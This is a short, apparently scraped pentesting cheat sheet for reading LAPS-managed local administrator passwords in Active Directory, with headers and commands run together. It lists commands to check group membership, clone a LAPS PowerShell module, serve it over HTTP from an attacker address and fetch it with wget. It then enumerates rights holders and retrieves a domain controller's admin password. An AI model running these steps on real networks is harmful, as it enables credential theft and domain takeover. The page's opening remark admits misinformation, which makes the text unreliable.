There are definitely misinfo in here. I don’t understand this.
Check privilege#
# should be in LAPS_Readers group
net user <user>LAPS PS module#
Clone repo#
git clone https://github.com/ztrhgf/LAPS.gitTransfer#
Open http server
mkdir upload
zip -r ./upload/AdmPwd.PS.zip ./LAPS/AdmPwd.PS
cd upload
python3 -m http.server 80Download
wget http://10.10.10.10:80/AdmPwd.PS.zip
Expand-Archive -Path ".\AdmPwd.PS.zip" -DestinationPath ".\AdmPwd.PS"Check#
See who(groups) can actually read or reset passwords
Find-LAPSDelegatedGroupsFind-AdmPwdExtendedRights -identity *See if we can read Domain Controller password. Should returns LAPS Readers, which is the group that we are in
Find-AdmPwdExtendedRights -identity 'Domain Controllers' | select-object ExtendedRightHoldersImport PS module#
import-module .\AdmPwd.PS\AdmPwd.PS.psd1Read domain controller password#
Get-LAPSComputersor
$env:COMPUTERNAME
get-admpwdpassword -computername dc01 | Select password